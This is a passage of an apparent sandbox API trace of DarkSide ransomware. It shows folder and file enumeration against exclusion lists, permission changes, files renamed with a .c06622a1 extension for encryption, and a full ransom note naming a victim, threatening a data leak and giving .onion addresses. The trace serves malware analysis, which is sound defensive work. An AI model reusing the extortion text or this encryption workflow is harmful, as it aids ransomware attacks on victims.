ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.813] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0147.818] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x58e6c37d [0147.818] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7879ae40 [0147.818] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73f32e03 [0147.818] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x41124ae1 [0147.818] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x35b470a8 [0147.818] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x665960cc [0147.818] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x68b3f4e0 [0147.818] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x65f322d7 [0147.821] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0xbad3b9b9 [0147.821] RtlComputeCrc32 (PartialCrc=0xb9b9, Buffer=0x4280094, Length=0x80) returned 0x24a87a27 [0147.821] RtlComputeCrc32 (PartialCrc=0x7a27, Buffer=0x4280094, Length=0x80) returned 0xeca0dbc3 [0147.821] RtlComputeCrc32 (PartialCrc=0xdbc3, Buffer=0x4280094, Length=0x80) returned 0xcef049ee [0147.821] RtlComputeCrc32 (PartialCrc=0x49ee, Buffer=0x4280094, Length=0x80) returned 0xd69daa50 [0147.821] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0147.821] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.821] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.821] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6261cd0, ftCreationTime.dwHighDateTime=0x1d5dc66, ftLastAccessTime.dwLowDateTime=0x294952f0, ftLastAccessTime.dwHighDateTime=0x1d5e7d1, ftLastWriteTime.dwLowDateTime=0x294952f0, ftLastWriteTime.dwHighDateTime=0x1d5e7d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h-Hlue", cAlternateFileName="")) returned 1 [0147.821] _wcsicmp (_Str1="$recycle.bin", _Str2="h-Hlue") returned -68 [0147.821] wcslen (_String="$recycle.bin") returned 0xc [0147.821] _wcsicmp (_Str1="config.msi", _Str2="h-Hlue") returned -5 [0147.821] wcslen (_String="config.msi") returned 0xa [0147.821] _wcsicmp (_Str1="$windows.~bt", _Str2="h-Hlue") returned -68 [0147.821] wcslen (_String="$windows.~bt") returned 0xc [0147.821] _wcsicmp (_Str1="$windows.~ws", _Str2="h-Hlue") returned -68 [0147.821] wcslen (_String="$windows.~ws") returned 0xc [0147.821] _wcsicmp (_Str1="windows", _Str2="h-Hlue") returned 15 [0147.821] wcslen (_String="windows") returned 0x7 [0147.821] _wcsicmp (_Str1="appdata", _Str2="h-Hlue") returned -7 [0147.821] wcslen (_String="appdata") returned 0x7 [0147.822] _wcsicmp (_Str1="application data", _Str2="h-Hlue") returned -7 [0147.822] wcslen (_String="application data") returned 0x10 [0147.822] _wcsicmp (_Str1="boot", _Str2="h-Hlue") returned -6 [0147.822] wcslen (_String="boot") returned 0x4 [0147.822] _wcsicmp (_Str1="google", _Str2="h-Hlue") returned -1 [0147.822] wcslen (_String="google") returned 0x6 [0147.822] _wcsicmp (_Str1="mozilla", _Str2="h-Hlue") returned 5 [0147.822] wcslen (_String="mozilla") returned 0x7 [0147.822] _wcsicmp (_Str1="program files", _Str2="h-Hlue") returned 8 [0147.822] wcslen (_String="program files") returned 0xd [0147.822] _wcsicmp (_Str1="program files (x86)", _Str2="h-Hlue") returned 8 [0147.822] wcslen (_String="program files (x86)") returned 0x13 [0147.822] _wcsicmp (_Str1="programdata", _Str2="h-Hlue") returned 8 [0147.822] wcslen (_String="programdata") returned 0xb [0147.822] _wcsicmp (_Str1="system volume information", _Str2="h-Hlue") returned 11 [0147.822] wcslen (_String="system volume information") returned 0x19 [0147.822] _wcsicmp (_Str1="tor browser", _Str2="h-Hlue") returned 12 [0147.822] wcslen (_String="tor browser") returned 0xb [0147.822] _wcsicmp (_Str1="windows.old", _Str2="h-Hlue") returned 15 [0147.822] wcslen (_String="windows.old") returned 0xb [0147.822] _wcsicmp (_Str1="intel", _Str2="h-Hlue") returned 1 [0147.822] wcslen (_String="intel") returned 0x5 [0147.822] _wcsicmp (_Str1="msocache", _Str2="h-Hlue") returned 5 [0147.822] wcslen (_String="msocache") returned 0x8 [0147.822] _wcsicmp (_Str1="perflogs", _Str2="h-Hlue") returned 8 [0147.822] wcslen (_String="perflogs") returned 0x8 [0147.822] _wcsicmp (_Str1="x64dbg", _Str2="h-Hlue") returned 16 [0147.822] wcslen (_String="x64dbg") returned 0x6 [0147.822] _wcsicmp (_Str1="public", _Str2="h-Hlue") returned 8 [0147.822] wcslen (_String="public") returned 0x6 [0147.822] _wcsicmp (_Str1="all users", _Str2="h-Hlue") returned -7 [0147.822] wcslen (_String="all users") returned 0x9 [0147.822] _wcsicmp (_Str1="default", _Str2="h-Hlue") returned -4 [0147.822] wcslen (_String="default") returned 0x7 [0147.822] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" [0147.822] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 0x2b [0147.822] wcscpy (in: _Dest=0x44b00bc, _Source="h-Hlue" | out: _Dest="h-Hlue") returned="h-Hlue" [0147.822] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.823] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.824] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" [0147.824] GetNamedSecurityInfoW () returned 0x0 [0147.824] SetEntriesInAclW () returned 0x0 [0147.824] SetNamedSecurityInfoW () returned 0x0 [0147.827] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57018) returned 1 [0147.827] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0147.827] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue")) returned 1 [0147.827] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0147.827] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0147.827] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0147.828] CloseHandle (hObject=0x1c) returned 1 [0147.829] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0147.829] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue")) returned 0x10 [0147.829] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\") returned="" [0147.829] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\") returned 0x31 [0147.829] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0147.829] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6261cd0, ftCreationTime.dwHighDateTime=0x1d5dc66, ftLastAccessTime.dwLowDateTime=0xd6baec60, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6baec60, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.830] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104b6780, ftCreationTime.dwHighDateTime=0x1d5d853, ftLastAccessTime.dwLowDateTime=0xa333a750, ftLastAccessTime.dwHighDateTime=0x1d5ddb8, ftLastWriteTime.dwLowDateTime=0xa333a750, ftLastWriteTime.dwHighDateTime=0x1d5ddb8, nFileSizeHigh=0x0, nFileSizeLow=0x12acc, dwReserved0=0x0, dwReserved1=0x0, cFileName="2eNvoC-ePTSuJslD.m4a", cAlternateFileName="2ENVOC~1.M4A")) returned 1 [0147.830] _wcsicmp (_Str1="2eNvoC-ePTSuJslD.m4a", _Str2="README.c06622a1.TXT") returned -64 [0147.830] wcsstr (_Str="2eNvoC-ePTSuJslD.m4a", _SubStr="README") returned 0x0 [0147.830] _wcsicmp (_Str1="autorun.inf", _Str2="2eNvoC-ePTSuJslD.m4a") returned 47 [0147.830] wcslen (_String="autorun.inf") returned 0xb [0147.830] _wcsicmp (_Str1="boot.ini", _Str2="2eNvoC-ePTSuJslD.m4a") returned 48 [0147.830] wcslen (_String="boot.ini") returned 0x8 [0147.830] _wcsicmp (_Str1="bootfont.bin", _Str2="2eNvoC-ePTSuJslD.m4a") returned 48 [0147.830] wcslen (_String="bootfont.bin") returned 0xc [0147.830] _wcsicmp (_Str1="bootsect.bak", _Str2="2eNvoC-ePTSuJslD.m4a") returned 48 [0147.830] wcslen (_String="bootsect.bak") returned 0xc [0147.830] _wcsicmp (_Str1="desktop.ini", _Str2="2eNvoC-ePTSuJslD.m4a") returned 50 [0147.830] wcslen (_String="desktop.ini") returned 0xb [0147.830] _wcsicmp (_Str1="iconcache.db", _Str2="2eNvoC-ePTSuJslD.m4a") returned 55 [0147.830] wcslen (_String="iconcache.db") returned 0xc [0147.830] _wcsicmp (_Str1="ntldr", _Str2="2eNvoC-ePTSuJslD.m4a") returned 60 [0147.830] wcslen (_String="ntldr") returned 0x5 [0147.830] _wcsicmp (_Str1="ntuser.dat", _Str2="2eNvoC-ePTSuJslD.m4a") returned 60 [0147.830] wcslen (_String="ntuser.dat") returned 0xa [0147.830] _wcsicmp (_Str1="ntuser.dat.log", _Str2="2eNvoC-ePTSuJslD.m4a") returned 60 [0147.830] wcslen (_String="ntuser.dat.log") returned 0xe [0147.830] _wcsicmp (_Str1="ntuser.ini", _Str2="2eNvoC-ePTSuJslD.m4a") returned 60 [0147.830] wcslen (_String="ntuser.ini") returned 0xa [0147.830] _wcsicmp (_Str1="thumbs.db", _Str2="2eNvoC-ePTSuJslD.m4a") returned 66 [0147.830] wcslen (_String="thumbs.db") returned 0x9 [0147.830] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0147.831] wcslen (_String="386") returned 0x3 [0147.831] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0147.831] wcslen (_String="adv") returned 0x3 [0147.831] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0147.831] wcslen (_String="ani") returned 0x3 [0147.831] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0147.831] wcslen (_String="bat") returned 0x3 [0147.831] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0147.831] wcslen (_String="bin") returned 0x3 [0147.831] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0147.831] wcslen (_String="cab") returned 0x3 [0147.831] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0147.831] wcslen (_String="cmd") returned 0x3 [0147.831] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0147.831] wcslen (_String="com") returned 0x3 [0147.831] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0147.831] wcslen (_String="cpl") returned 0x3 [0147.831] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0147.831] wcslen (_String="cur") returned 0x3 [0147.831] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0147.831] wcslen (_String="deskthemepack") returned 0xd [0147.831] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0147.831] wcslen (_String="diagcab") returned 0x7 [0147.831] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0147.831] wcslen (_String="diagcfg") returned 0x7 [0147.831] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0147.831] wcslen (_String="diagpkg") returned 0x7 [0147.831] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0147.831] wcslen (_String="dll") returned 0x3 [0147.831] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0147.831] wcslen (_String="drv") returned 0x3 [0147.831] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0147.831] wcslen (_String="exe") returned 0x3 [0147.831] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0147.831] wcslen (_String="hlp") returned 0x3 [0147.831] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0147.831] wcslen (_String="icl") returned 0x3 [0147.831] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0147.832] wcslen (_String="icns") returned 0x4 [0147.832] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0147.832] wcslen (_String="ico") returned 0x3 [0147.832] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0147.832] wcslen (_String="ics") returned 0x3 [0147.832] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0147.832] wcslen (_String="idx") returned 0x3 [0147.832] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0147.832] wcslen (_String="ldf") returned 0x3 [0147.832] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0147.832] wcslen (_String="lnk") returned 0x3 [0147.832] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0147.832] wcslen (_String="mod") returned 0x3 [0147.832] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0147.832] wcslen (_String="mpa") returned 0x3 [0147.832] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0147.832] wcslen (_String="msc") returned 0x3 [0147.832] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0147.832] wcslen (_String="msp") returned 0x3 [0147.832] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0147.832] wcslen (_String="msstyles") returned 0x8 [0147.832] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0147.832] wcslen (_String="msu") returned 0x3 [0147.832] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0147.832] wcslen (_String="nls") returned 0x3 [0147.832] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0147.832] wcslen (_String="nomedia") returned 0x7 [0147.832] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0147.832] wcslen (_String="ocx") returned 0x3 [0147.832] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0147.832] wcslen (_String="prf") returned 0x3 [0147.832] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0147.832] wcslen (_String="ps1") returned 0x3 [0147.832] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0147.832] wcslen (_String="rom") returned 0x3 [0147.832] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0147.832] wcslen (_String="rtp") returned 0x3 [0147.832] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0147.833] wcslen (_String="scr") returned 0x3 [0147.833] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0147.833] wcslen (_String="shs") returned 0x3 [0147.833] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0147.833] wcslen (_String="spl") returned 0x3 [0147.833] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0147.833] wcslen (_String="sys") returned 0x3 [0147.833] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0147.833] wcslen (_String="theme") returned 0x5 [0147.833] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0147.833] wcslen (_String="themepack") returned 0x9 [0147.833] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0147.833] wcslen (_String="wpx") returned 0x3 [0147.833] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0147.833] wcslen (_String="lock") returned 0x4 [0147.833] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0147.833] wcslen (_String="key") returned 0x3 [0147.833] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0147.833] wcslen (_String="hta") returned 0x3 [0147.833] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0147.833] wcslen (_String="msi") returned 0x3 [0147.833] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0147.833] wcslen (_String="pdb") returned 0x3 [0147.833] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0147.833] wcslen (_String="sql") returned 0x3 [0147.833] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0147.833] wcslen (_String="sqlite") returned 0x6 [0147.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue")) returned 0x10 [0147.833] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0147.834] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" [0147.834] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue") returned 0x30 [0147.834] wcscpy (in: _Dest=0x45000f2, _Source="2eNvoC-ePTSuJslD.m4a" | out: _Dest="2eNvoC-ePTSuJslD.m4a") returned="2eNvoC-ePTSuJslD.m4a" [0147.834] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\2eNvoC-ePTSuJslD.m4a", dwFileAttributes=0x80) returned 1 [0147.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\2eNvoC-ePTSuJslD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\2envoc-eptsujsld.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0147.834] SetFilePointerEx (in: hFile=0x660, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.834] ReadFile (in: hFile=0x660, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0147.835] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xf02cf77d [0147.835] RtlComputeCrc32 (PartialCrc=0xf77d, Buffer=0x3fe8f4, Length=0x80) returned 0x3dcb982b [0147.835] RtlComputeCrc32 (PartialCrc=0x982b, Buffer=0x3fe8f4, Length=0x80) returned 0xbbf24f2c [0147.835] RtlComputeCrc32 (PartialCrc=0x4f2c, Buffer=0x3fe8f4, Length=0x80) returned 0xd68d1d10 [0147.835] RtlComputeCrc32 (PartialCrc=0x1d10, Buffer=0x3fe8f4, Length=0x80) returned 0x1926ad5f [0147.835] CloseHandle (hObject=0x660) returned 1 [0147.835] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0147.835] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\2eNvoC-ePTSuJslD.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\2eNvoC-ePTSuJslD.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\2eNvoC-ePTSuJslD.m4a" [0147.835] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\2eNvoC-ePTSuJslD.m4a") returned 0x45 [0147.835] wcscpy (in: _Dest=0x4510122, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.835] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\2eNvoC-ePTSuJslD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\2envoc-eptsujsld.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\2eNvoC-ePTSuJslD.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\2envoc-eptsujsld.m4a.c06622a1"), dwFlags=0x8) returned 1 [0147.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\2eNvoC-ePTSuJslD.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\2envoc-eptsujsld.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x660 [0147.838] CreateIoCompletionPort (FileHandle=0x660, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.838] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0147.844] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3571bf97 [0147.844] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x287db5b0 [0147.844] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x786bbe10 [0147.844] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66ae95ae [0147.844] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x214445 [0147.844] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa24741e [0147.844] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x23f67f9f [0147.844] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x156c3c4f [0147.847] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0x8d3dfaef [0147.847] RtlComputeCrc32 (PartialCrc=0xfaef, Buffer=0x4670094, Length=0x80) returned 0xa3fdb88a [0147.847] RtlComputeCrc32 (PartialCrc=0xb88a, Buffer=0x4670094, Length=0x80) returned 0x3cd5b8d2 [0147.848] RtlComputeCrc32 (PartialCrc=0xb8d2, Buffer=0x4670094, Length=0x80) returned 0x2206476b [0147.848] RtlComputeCrc32 (PartialCrc=0x476b, Buffer=0x4670094, Length=0x80) returned 0x4890dba4 [0147.848] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0147.848] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0147.848] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0147.848] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9ad20, ftCreationTime.dwHighDateTime=0x1d5d933, ftLastAccessTime.dwLowDateTime=0x48f0f580, ftLastAccessTime.dwHighDateTime=0x1d5da44, ftLastWriteTime.dwLowDateTime=0x48f0f580, ftLastWriteTime.dwHighDateTime=0x1d5da44, nFileSizeHigh=0x0, nFileSizeLow=0xbb9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="aLxsOiDGUFDq.pdf", cAlternateFileName="ALXSOI~1.PDF")) returned 1 [0147.848] _wcsicmp (_Str1="aLxsOiDGUFDq.pdf", _Str2="README.c06622a1.TXT") returned -17 [0147.848] wcsstr (_Str="aLxsOiDGUFDq.pdf", _SubStr="README") returned 0x0 